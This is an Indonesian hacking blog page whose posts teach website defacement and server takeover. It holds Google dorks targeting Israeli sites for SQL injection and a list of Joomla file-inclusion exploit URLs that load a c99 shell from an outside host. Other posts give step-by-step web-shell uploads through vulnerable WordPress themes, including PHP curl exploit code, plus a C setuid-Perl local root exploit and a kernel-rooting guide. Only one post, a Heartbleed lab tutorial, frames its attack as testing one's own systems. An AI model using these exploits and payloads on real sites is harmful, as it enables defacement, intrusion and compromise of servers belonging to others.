Home » All posts

Kamis, 17 Juli 2014

Tutorial Install Sqlmap Di VPS

    
     
           Haii wkwkwk udh lama gk ngepost nih wkkwk soalnya pensiun bentar trus skrg balik lagi oke kali ini saya akan share tutor install SQLMAP Di VPS
Bahan-Bahan :
-PC Yang sudah terconnect di Internet
-Putty For Windows
-Akun VPS
Langkah-langkah :
1.Buka Putty Lalu Masukan IP VPSnya 
2.ketik “sudo apt-get install git” Kalo Gk bisa “yum install git
3.Ketik “git clone https://github.com/sqlmapproject/sqlmap.git” Lalu Tekan Enter tunggu   Beberapa saat 
4.Jika Sudah Ketikan Perintah "cd \sqlmap"
5.Tinggal Ketik .”./sqlmap.py” atau “python sqlmap.py
Langsung Lihat Videonya 
~> Klik Disini
21.51  Unknown  No comments
Read More

Dork SQL Injection Website Israel

Dork :
intext:"error in your SQL syntax" +site:il

intext:"mysql_num_rows()" +site:il

intext:"mysql_fetch_array()" +site:il

intext:"Error Occurred While Processing Request" +site:il

intext:"Server Error in '/' Application" +site:il

intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il

intext:"Invalid Querystring" +site:il

intext:"OLE DB Provider for ODBC" +site:il

intext:"VBScript Runtime" +site:il

intext:"ADODB.Field" +site:il

intext:"BOF or EOF" +site:il

intext:"ADODB.Command" +site:il

intext:"JET Database" +site:il

intext:"mysql_fetch_row()" +site:il

intext:"Syntax error" +site:il

intext:"include()" +site:il

intext:"mysql_fetch_assoc()" +site:il

intext:"mysql_fetch_object()" +site:il

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input string was not in a correct format" +site:il
21.45  Unknown  No comments
Read More

Deface dengan optimizepress

Bahan - Bahan :
- Shell ( Terserah Shell Apa )
- Komputer ( Sudah Terkoneksi Internet :D )

Langkah - Langkah :

1).Buka Google.com Masukan Dork Berikut
Dork : inurl:/wp-content/themes/OptimizePress/

2).Kalo Sudah  Menemukan Site
3).Masukan Exploit : /wp-content/themes/OptimizePress/lib/admin/media-upload.php
4).Jika Succes Akan Keluar Halaman Seperti Berikut

5).Scroll Ke Bawah Nanti Ada Uploader Trus Upload Shell Kamu =))
6).Jika Succes Nanti Akan Keluar Nama Shell Kamu Contoh Nama Shell Saya b.php




7).Untuk Letak Shell http://site/wp-content/uploads/optpress/images_comingsoon/yourshell.php
Contoh : http://site/wp-content/uploads/optpress/images_comingsoon//2013121101-39-39b.php
21.43  Unknown  No comments
Read More

Deface Web Iklan

Alat yang di butuhkan hanya pake Live HTTP Headers download DISINI atau bisa pake DISINI 
Dork : intext:pasang iklan gratis ( use your brain :D )
siap kan shell lalu rename menjadi jpg
contoh shell.php.jpg
cari web lalu exploit / tambahkan /banner/pasang
misal www.site.com/banner/pasang



jika sudah ketemu masuk ke pasang iklan banner
lalu isi data asala aja
di kolom form upload kamu masukan shell kamu yang sudah di rename tadi

submit iklan nya lalu nanti akan tampil menu tamper2 nah kamu tamper data nya
cari nama shell.php.jpg lalu kamu rename kembali menjadi shell.php 




dan taraaaaaaaa shell kamu dah masuk ke web tersebut defaul nya ada di target.com/images/bnrs/(namashell).php tapi tergantung setelen web nya juga ..



Selanjutnya terserah anda mau di apain.. 
00.53  Unknown  No comments
Read More

Kumpulan Exploit Joomla


google Dork :
inurl:"com_joomlaboard"
ExpLoit:/components/com_joomlaboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
ExpLoit:/components/com_joomlaboard/image_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_admin"
ExpLoit:/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_simpleboard
ExpLoit:/components/com_simpleboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_hashcash"
ExpLoit:/components/com_hashcash/server.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_sitemap"
ExpLoit:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_forum"
ExpLoit:/components/com_forum/download.php?phpbb_root_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_pccookbook"
ExpLoit:/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_extcalendar
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"minibb"
ExpLoit:/components/minibb/index.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_smf"
ExpLoit:/components/com_smf/smf.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/modules/mod_calendar.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_pollxt"
ExpLoit:/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_loudmounth"
ExpLoit:/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_videodb"
ExpLoit:/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_pcchess
ExpLoit:/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google Dork;
inurl:"com_multibanners"
ExpLoit:/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_a6mambohelpdesk"
ExpLoit:/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_colophon"
ExpLoit:/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_mgm"
ExpLoit:/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_mambatstaff"
ExpLoit:/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_securityimages"
ExpLoit:/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_securityimages/lang.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_artlinks"
ExpLoit:/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_galleria"
ExpLoit:/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_zoom"
ExpLoit:/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_serverstat"
ExpLoit:/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"mambo"
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
00.52  Unknown  No comments
Read More

Root Exploit


Bentuk dari exploit itu adalah seperti ini
/*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF – kf_lists[at]secnetops[dot]com – 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/
Lho ID nya dah root?? xD.. Untuk kernel yang lainnya juga tidak jauh berbeda
Hehehe… Monggo silakan di cari local root exploit yang lain ya
#define PRELOAD “/etc/ld.so.preload”
#include <stdio.h>
#include <strings.h>
int main(int *argc, char **argv)
{
FILE *getuid;
if(!(getuid = fopen(“/tmp/getuid.c”,”w+”))) {
printf(“error opening file\n”);
exit(1);
}
fprintf(getuid, “int getuid(){return 0;}\n” );
fclose(getuid);
system(“cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so
/tmp/getuid.c -lc”);
putenv(“PERLIO_DEBUG=”PRELOAD);
umask(001); // I’m rw-rw-rw james bitch!
system(“/usr/bin/sperl5.8.4″);
FILE *ld_so_preload;
char preload[] = {
“/tmp/getuid.so\n”
};
if(!(ld_so_preload = fopen(PRELOAD,”w+”))) {
printf(“error opening file\n”);
exit(1);
}
fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
fclose(ld_so_preload);
}
dikutip dari http://www.k-otik.com/exploits/20050207.ex_perl.c.php
untuk menyelesaikanya ada dengan cara :
1. boot pake knoppix atau linux rescue
2. trus cari file dengan nama file /etc/ld.so.preload
3. dalam file tersebut isinnya /tmp/getuid.so
4. kalo ada file tersebut hapus ajah jagn ragu2
5. setelah itu boot lage dari harddisk, ngga perlu diinstall ulang
jadi cara kerja dari exploit itu adalah ketika kita booting dia akan mencara file /tmp/getuid.so yang padahal sebenarnya emang ngga ada …. jadi hati hati dengan exploit ini… kalo emang ngga mao dibuat bingung ….
jadi buat temen temen sekalian yang udah ngebantu saya ucapkan terima kasih banyak :) :D
00.50  Unknown  No comments
Read More

Admin Finder [PYTHON SCRIPT]

Hello sobat :D
kali ini saya akan share alat untuk mencari halaman login admin di dalam suatu website :D kan percuma jika tau username dan password si admin, tetapi tidak mengetahui halaman login adminnya :D

Sebelum menggunakan adminfinder.py ?? pastika PC anda sudah terinstall PYTHON ?? jika belom ??
Download disini :
-Download Python

Okkhe sudah kan ?? langsung disedot aja :D
-Download Admin Finder [PYTHON SCRIPT]


Admin Finder

Thanks telah berkunjung ^_^ jangan lupa berkomentar ya ^_^
00.44  Unknown  No comments
Read More

Exploit

EXPLOIT DATABASE

PACKETSTORM DATABASE

  • 16 July 2014: Oracle Data Redaction Is Broken - Files ≈ Packet Storm
    Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure.
  • 16 July 2014: pyClamd 0.3.10 - Files ≈ Packet Storm
    pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product.
  • 16 July 2014: Bitdefender GravityZone File Disclosure / Missing Authentication - Files ≈ Packet Storm
    Bitdefender GravityZone versions prior to 5.1.11.432 suffer from local file disclosure, insecure service configuration, and missing authentication vulnerabilities.
  • 16 July 2014: Microsoft Windows DirectShow Privilege Escalation - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Windows. The vulnerability is caused by an input validation error in DirectShow when processing and unserializing "Stretch" objects in memory, which could be exploited to elevate privileges and execute arbitrary code in the context of the logged on user, or e.g. bypass Internet Explorer's Enhanced Protected Mode (EPM) sandbox.
  • 16 July 2014: e107 2.0 alpha2 Cross Site Scripting - Files ≈ Packet Storm
    e107 version 2.0 alpha2 suffers from a reflective cross site scripting vulnerability.
  • 16 July 2014: Citrix Netscaler Disclosure / Cross Site Scripting - Files ≈ Packet Storm
    Citrix NetScaler Application Delivery Controller and Citrix NetScaler Gateway are susceptible to cookie disclosure and reflective cross site scripting vulnerabilities.
  • 16 July 2014: Microsoft Internet Explorer ShowSaveFileDialog() Sandbox Bypass - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused due to an invalid handling of a sequence of actions aimed to save a file when calling "ShowSaveFileDialog()", which could be exploited by a sandboxed process to write files to arbitrary locations on the system and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: OpenVPN Access Server Arbitrary Code Execution - Files ≈ Packet Storm
    Remote attackers can execute arbitrary code and execute other attacks on computers with the OpenVPN Access Server "Desktop Client" installed.
  • 16 July 2014: Microsoft Internet Explorer Request Object Confusion Sandbox Bypass - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by an object confusion vulnerability when processing object types within data shared between the broker and sandboxed processes, which could be exploited by a sandboxed process to achieve code execution within the broker context and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: Microsoft Internet Explorer CSS @import Memory Corruption - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by a use-after-free vulnerability when manipulating CSS @import statements through "addImport()" or "removeImport()", which could be exploited by attackers to leak arbitrary memory or execute arbitrary code via a malicious web page. Versions 9, 10, and 11 are affected.
  • 16 July 2014: Alfresco Community Edition 4.2.f Server Side Request Forgery - Files ≈ Packet Storm
    Alfresco Community Edition versions 4.2.f and below suffer from multiple server side request forgery vulnerabilities.
  • 16 July 2014: HP Security Bulletin HPSBMU03072 SSRT101644 - Files ≈ Packet Storm
    HP Security Bulletin HPSBMU03072 SSRT101644 - A potential security vulnerability has been identified with HP Data Protector. This vulnerability could be remotely exploited to execute arbitrary code. Revision 1 of this advisory.
  • 16 July 2014: Ubuntu Security Notice USN-2280-1 - Files ≈ Packet Storm
    Ubuntu Security Notice 2280-1 - It was discovered that MiniUPnPc incorrectly handled certain buffer lengths. A remote attacker could possibly use this issue to cause applications using MiniUPnPc to crash, resulting in a denial of service.
  • 16 July 2014: Ubuntu Security Notice USN-2279-1 - Files ≈ Packet Storm
    Ubuntu Security Notice 2279-1 - Ben Hawkes discovered that Transmission incorrectly handled certain peer messages. A remote attacker could use this issue to cause a denial of service, or possibly execute arbitrary code.
  • 16 July 2014: Red Hat Security Advisory 2014-0889-01 - Files ≈ Packet Storm
    Red Hat Security Advisory 2014-0889-01 - The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions. A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.

CERT VULNERABILITY DATABASE

SECURITYFOCUS DATABASE

00.39  Unknown  1 comment
Read More

Jumat, 30 Mei 2014

Detecting OpenSSL-Heartbleed with Nmap & Exploiting with Metasploit

You can now quickly detect the OpenSSL-Heartbleed vulnerability very quickly on a network using the ever popular nmap command, and with the latest modules from Metasploit you can quickly see the exploit in action.
For this tutorial I will be using a WordPress server and Kali Linux running in two separate VMWare virtual machines.
For a vulnerable server, I used one of Turnkey Linux WordPress VMs.  There are security updates available for Turnkey’s WordPress, but during the VM setup, and for this tutorial, I purposefully told the VM NOT to install the security updates so I could test for the OpenSSL vulnerability.
Once the WordPress VM was configured (just answer a few simple questions) I then fired up my Kali Linux VM.
Nmap has created a Heartbleed script that does a great job of detecting vulnerable servers. The script may not be available in your version of Kali, so you may have to manually install it.

Detecting Exploit with Nmap

If the Open-Heartbleed script is not already included in your nmap install, you will need to manually install it.
This is pretty easy, just visit the OpenSSL-Heartbleed nmap Script page, copy and save the nmap nse script file to your nmap “scripts” directory as seen below:
Heartbleed nmap script save
You will also need the nmap “tls.lua” library file, save this to the nmap “nselib” directory as seen below:
Heartbleed nmap tls library
That is it, we can now use the heartbleed script in nmap to detect vulnerable systems.
To use the command the syntax is:
nmap -sV --script=ssl-heartbleed <target>
All we need to plug in is the IP address of our target test WordPress site, 192.168.1.70 in this instance:
heartbleed nmap script command
And if the target machine is vulnerable we will see this:
nmap heartbleed vulnerable detected
State: VULNERABLE Risk Factor: High

Exploiting with Metasploit

Now that we know we have a vulnerable server, we can use the latest Metasploit OpenSSL-Heartbleed module to exploit it. (Note: you can use the module to detect vulnerable systems also)
Update metasploit to get the latest modules. Just type “msfupdate” at a Kali command prompt:
msfupdate
Now run “msfconsole” to start Metasploit and you will be presented with the Metasploit console:
Metasploit prompt
Next search for the heartbleed modules:
heartbleed search
Notice there are two, we will just be using the scanner.
Type, “use auxiliary/scanner/ssl/openssl_heartbleed“:
heartbleed metasploit module
We are just going to set two options, “set VERBOSE” to true and we need to “set RHOSTS” to our target IP address as seen below:
verbose rhosts
And finally, just “run” the exploit:
heartbleed leaked data
If you click on the picture above, you will see that Metasploit communicated with the server and was able to pull random data from the server’s memory.
The important thing to note here is that it pulls random data from memory. There is no guarantee that you will find account credentials, session cookie data or critical data every time you run this. But the danger is in the fact that it could display sensitive data.
Thus the best practice (if you haven’t already) is to check your systems for the heartbleed vulnerability and patch them immediately. After the systems are patched change any passwords on the effected machines.
As always, never run security scans or checks on systems that you do not own or have approval to scan.
If you enjoyed this tutorial and want to learn more about Kali Linux and Metasploit, check out my latest book on Amazon, “Basic Security Testing with Kali Linux“.
00.00  Unknown  No comments
Read More

Kamis, 29 Mei 2014

Tutorial Rooting Server



Okke kali Ini Saya akan share Tutor Rooting Server heheheh walaupun tutor agak acak acakan,mohon di maklumi bray nubie xixixi :D :D

Bahan - Bahan :

- VPS
- Putty For Windows
- Web Yang Sudah Tertanam Shell
- Exploit Kernel :D

Langkah - Langkah :

1.Backconnect dulu untuk tutor backconnect bisa di tonton > disini <



2.Setelah Di Backconnect Akan Keluar Kernelnya Lalu Kita Search google
  ~> Exploit Kernel [kernel web] contoh :
  ~> Exploit Kernel 2.6.32



3.Setelah Menemukan Upload Exploit Ke Web


4.Kita Kembali Ke putty Lagi Ganti chmodnya menjadi 777 dengan cara :
  ~> "chmod +x namafile"
  ~> "chmod 777 namafile"


5.Tinggal Kita Excute dengan cara "./namafile" Contoh "./xxx"



6.Coba Ketik id Jika Keluar
  ~> uid=0(root) gid=0(root) groups=0(root) Berarti Succes Jika Error Berarti Kernel Kurang        Pas :D


Gak mudeng? langsung tonton videonya 
~> Klik Disini
23.47  Unknown  1 comment
Read More

Senin, 14 April 2014

DEFACE WORDPRESS MENGGUNAKAN TEKNIK WP-INSTALL

Kalo uda selesai, dah ketikkan diform pencarian /wp-admin/install.php bisa ditambahin Country:ID (Indonesia) / MY (Malaysia) / yang lain

HACK WORDPRESS




Pilih HTTP/1.0 302 Found, ya pasti uda tau lah knapa harus yg HTTP/1.0 302 Found.,.,kenapa bukan yg HTTP/1.0 302 Moved Temporarily
Karena kan kalau Found berarti Ditemukan, nah udah itu aja penjelasannya intinya pilih yg Found ,



Next, Isi Form nya,meliputi :

Site Title
Username
Password


seperti gambar dibawah :

TARAA.... FINISHH! Big Grin Mulai deh ganti tagline/title nya biar KE INDEX GOOGLE Big Grin



============================================================================

CATATAN :
KALO MUNCUL GINIAN , NIH , , (CEK GAMBAR DIBAWAH)
BERARTI NDAK BISA , LANJUT CARI LAGI AJA COZ UDA DI INSTALL SAMA SI EMPU NYA/KALAH CEPET MA ORANGG YANG LAGI BACA NIH TUTZ 
HACK WORDPRESS


HACK WORDPRESS
23.50  Unknown  1 comment
Read More

Deface Dengan WP-Store Themes Uploader

Langkah-Langkah:
1. Cari target dengan Google Dork ini:
inurl:/wp-content/themes/eShop/ 
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
*Anda bisa menambahkan elemen Site: Di belakang Google Dork Tersebut
Ex: site:co.uk dll

2. Setelah Target ditemukan. langkah selanjutnya adalah masukkan exploit ini:
/wp-content/themes/WPStore/upload/
ex: site.com/wp-content/themes/eShop/style.css
menjadi
site.com/wp-content/themes/WPStore/upload/



3. Setelah muncul tampilan seperti gambar diatas. Lalu kamu Upload Shell / Script Deface dalam bentuk .html
4. Setelah selesai, masukkan wp-content/uploads/products_img/namashell.php setelah alamat web target.
Ex: site.com/wp-content/themes/WPStore/upload/
menjadi
site.com/wp-content/uploads/products_img/namashell.php
*nama shell diganti dengan nama shell kamu.
*jika 404 not found, berarti web tersebut tidak bisa di tanam shell. dan cobalah untuk mengupload script deface.
5. Setelah masuk ke dalam shell. Tebas deh index.php nya. bukan index.html nya.

 Copied by : scupe.id
23.49  Unknown  No comments
Read More

Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability

Google Dork : inurl:wp-content/themes/magnitudo 
Use your brain untuk menemukan dork lainnya :)

Exploit :

<?php
$uploadfile="shell.php";
$ch = curl_init("http://site.com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Pertama download XAMMP nya HERE HERE

Jika Sudah , Cari File php.ini di System[C] -> Xammp -> Php -> Php.ini

Lalu tekan Control F dan ketikkan "curl" tanpa tanda kutip , lalu jika ketemu kamu hapus tandan ( ; ) , Lalu save ..

Oke , sekarang kamu Copy Exploitnya dan save dengan extensi .php

Simpan di folder xammp -> xammp -> PHP

Kedua , kamu copy shell kamu ke Folder xammp -> xammp -> PHP

Misalkan nama shell anda x.php ganti shell php yang ada di exploit tadi

$uploadfile="shell.php"; kamu rename dengan nama shell kamu tadi jika namanya x.php kamu rename menjadi x.php juga :))

Oke sekarang langsung saja , Pertama kita cari target dengan GOOGLE DORK tadi

Ex : http:/www.site.com/

Lalu tambahkan dengan exploitnya
/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php

Jika Ada Error Files Upload  berarti itu vuln .

Buka exploitnya kamu copy semuanya ke exploit tadi 

Lalu buka CMD , 

Ketikkan cd xammp enter >> cd php enter

Jika succes , filenya akan berada disini


http://site.com/wordpress/wp-content/uploads/2013/10/x.php

Sekian dulu Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability Semoga bermanfaat :)
23.47  Unknown  No comments
Read More

Postingan Lebih Baru Postingan Lama Beranda